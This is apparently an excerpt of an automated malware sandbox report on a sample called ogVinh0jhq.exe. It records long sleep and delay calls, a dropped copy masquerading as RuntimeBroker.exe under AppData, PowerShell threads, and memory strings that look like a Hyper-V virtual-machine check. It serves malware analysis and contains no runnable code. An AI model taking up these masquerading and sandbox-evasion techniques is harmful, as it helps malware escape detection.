Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -585422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -585312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -585172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -585057s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -584922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -584797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -584672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -583644s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -583374s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -583005s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -582797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 6896	Thread sleep time: -582374s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 7264	Thread sleep count: 366 > 30
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 8168	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\ogVinh0jhq.exe TID: 7904	Thread sleep count: 835 > 30
Source: C:\Users\user\Desktop\ogVinh0jhq.exe TID: 7864	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe TID: 7468	Thread sleep count: 367 > 30
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe TID: 8000	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe TID: 8136	Thread sleep count: 364 > 30
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe TID: 8100	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1360	Thread sleep count: 4701 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3068	Thread sleep count: 4655 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\ogVinh0jhq.exe TID: 7744	Thread sleep count: 366 > 30
Source: C:\Users\user\Desktop\ogVinh0jhq.exe TID: 7512	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 7632	Thread sleep count: 366 > 30
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 4124	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe TID: 5672	Thread sleep count: 366 > 30
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe TID: 3668	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 3444	Thread sleep count: 367 > 30
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 7968	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe TID: 3236	Thread sleep count: 364 > 30
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe TID: 5756	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 2056	Thread sleep count: 365 > 30
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe TID: 7096	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe TID: 6916	Thread sleep count: 367 > 30
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe TID: 6992	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe TID: 1928	Thread sleep count: 365 > 30
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe TID: 4336	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\ogVinh0jhq.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 599523	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 599250	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 599141	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 598841	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 598591	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 598190	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 597421	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 597170	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 596926	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 596561	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 596452	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 596215	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 594427	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 593891	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 593702	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 593250	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 592844	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 591391	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 591032	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 590672	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 590047	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 589000	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 588532	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 588297	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 588110	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 587954	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 587813	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 587698	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 587578	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 587274	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 586485	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 586360	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 586204	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 585954	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 585422	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 585312	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 585172	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 585057	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 584922	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 584797	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 584672	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 583644	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 583374	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 583005	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 582797	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 582374	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\ogVinh0jhq.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\servicing\Packages\Microsoft-Windows-HyperV-OptionalFeature-VirtualMachinePlatform-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1766.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.19041.1741_none_b62736d427ac1a0c\f\vmicrdv.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.19041.2006_none_ab6b7b2814133920.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: yC:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.19041.1741_none_78a9b11b7a3cc41b\vmdebug.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-i..nents-rdv.resources_31bf3856ad364e35_10.0.19041.1_en-us_b3d1ef0d088d6955.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Package-base-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tC:\Windows\servicing\Packages\Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: lC:\Windows\servicing\Packages\Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Compute-System-VirtualMachine-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: rC:\Windows\servicing\Packages\Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-vstack-vmwp.resources_31bf3856ad364e35_10.0.19041.1_en-us_369e8b635061fdb3.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \|C:\Windows\servicing\Packages\HyperV-Feature-VirtualMachinePlatform-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1766.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: rC:\Windows\servicing\Packages\Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..ypervisor.resources_31bf3856ad364e35_10.0.19041.1_en-us_c2edb07518552135\hvservice.sys.mui
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tC:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-vid_31bf3856ad364e35_10.0.19041.1_none_56baaad119b4f126.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-o..oyment-languagepack_31bf3856ad364e35_10.0.19041.1_en-gb_165edb2e5d580618.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..ck-virtualizationv2_31bf3856ad364e35_10.0.19041.1_none_25a2ff96aac272dd\WindowsVirtualization.V2.mof
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\f\VmsProxyHNic.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: oC:\Windows\WinSxS\amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.19041.1_none_555170071aa29c2c\Manifest.psd1
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: wC:\Windows\servicing\Packages\Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.488.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \|C:\Windows\servicing\Packages\HyperV-Feature-VirtualMachinePlatform-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1766.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: mC:\Windows\WinSxS\amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.19041.1_none_555170071aa29c2c\Hyper-V.ps1
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.488.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: wC:\Windows\servicing\Packages\Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.488.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: uC:\Windows\servicing\Packages\HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.488.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.19041.1741_none_78a9b11b7a3cc41b.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-3dvideo.resources_31bf3856ad364e35_10.0.19041.928_en-us_4257e8c2720c2e68.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-passthru-parser_31bf3856ad364e35_10.0.19041.1_none_d7dfb451bd621127\passthruparser.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: wC:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.19041.2006_none_ab6b7b2814133920\f\vmms.exe
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: }C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1741.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-o..p-merged-deployment_31bf3856ad364e35_10.0.19041.1741_none_27157646a7f74243.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\servicing\Packages\Microsoft-Hyper-V-Offline-Core-Group-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
